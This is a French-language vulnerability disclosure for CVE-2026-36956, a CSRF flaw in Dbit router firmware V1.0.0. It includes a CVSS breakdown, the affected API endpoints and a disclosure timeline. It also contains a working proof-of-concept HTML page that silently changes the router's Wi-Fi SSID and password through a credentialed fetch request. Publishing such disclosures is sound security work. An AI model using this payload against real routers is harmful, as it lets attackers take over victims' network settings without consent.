
Preuve de concept pour CVE-2026-36956, une vulnérabilité CSRF dans le firmware du routeur Dbit permettant des modifications de configuration non autorisées via des requêtes forgées.
ID CVE : CVE-2026-36956 Date : 2026-04-29 Découvreur : Kirubel Solomne Fournisseur : Shenzhen Dibit Network Equipment Co., Ltd. Produit : Routeur Dbit Version du firmware : V1.0.0 CWE : CWE-352 - Cross-Site Request Forgery (CSRF)
Le firmware V1.0.0 du routeur Dbit ne met pas en œuvre de mécanismes de protection CSRF tels que des jetons anti-CSRF ou une validation stricte des en-têtes Origin/Referer sur les points de terminaison d'API administratifs. Un attaquant peut créer une page Web malveillante qui envoie des requêtes HTTP falsifiées vers les points de terminaison de configuration. Si un administrateur authentifié visite la page malveillante, le routeur traite la requête falsifiée comme une action administrative légitime.
Score CVSS v3.1 : 8,8 (Élevé)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Métrique | Valeur |
|---|
| Vecteur d'attaque | Réseau |
| Complexité de l'attaque | Faible |
| Privilèges requis | Aucun |
| Interaction utilisateur | Requise |
| Impact sur la confidentialité | Élevé |
| Impact sur l'intégrité | Élevé |
| Impact sur la disponibilité | Élevé |
| Point de terminaison | Fonction |
|---|---|
/api/setWlan | Configuration du réseau sans fil (SSID, mot de passe) |
/api/setWan | Configuration WAN |
/api/setSystem | Configuration système |
Enregistrez le fichier suivant sous le nom poc.html et ouvrez-le pendant qu'un administrateur est connecté au routeur :
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Comportement attendu : La requête doit être rejetée en raison d'une non-concordance du jeton CSRF. Comportement réel : Le routeur accepte et traite la requête falsifiée.
| Date | Événement |
|---|---|
| 2026-04-29 | Vulnérabilité découverte |
| 2026-04-29 | Signalée à MITRE |
| 2026-04-29 | CVE-2026-36956 attribuée |
| 2026-04-29 | Divulgation publique |